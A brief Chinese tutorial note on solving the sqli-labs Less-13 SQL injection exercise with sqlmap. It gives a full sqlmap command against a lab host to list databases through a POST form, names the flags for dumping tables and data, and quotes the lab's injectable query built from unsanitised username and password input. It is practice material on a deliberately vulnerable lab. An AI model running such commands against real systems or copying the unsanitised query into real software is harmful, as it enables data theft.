网络安全-sqlmap实战之sqlilabs-Less13

目录

类型

获取数据库

查看源代码


类型

双层-单引号及括号

获取数据库

python sqlmap.py -u "http://192.168.31.12/sqli-labs_1/Less-13/" --forms --dbms mysql --answers="extending=N" --threads 8 -dbs --batch

 

网络安全-sqlmap实战之sqlilabs-Less13_第1张图片 发现参数
网络安全-sqlmap实战之sqlilabs-Less13_第2张图片 结果

--forms参数还是比较快的,针对POST表单有三种方式,可以查看网络安全-sqlmap实战之sqlilabs-Less11中的小总结

 之后的获取表名,列名及内容就不写了,还是-D、--tables、-T、--columns、-C、-dump、--dump-fomat参数

优化的话可以使用--technique BEU,基于时间的注入还是比较浪费时间的。

查看源代码

@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";

 更多内容查看:网络安全-自学笔记

喜欢本文的请动动小手点个赞,收藏一下,有问题请下方评论,转载请注明出处,并附有原文链接,谢谢!如有侵权,请及时联系。如果您感觉有所收获,自愿打赏,可选择支付宝18833895206(小于),您的支持是我不断更新的动力。

你可能感兴趣的:(网络安全)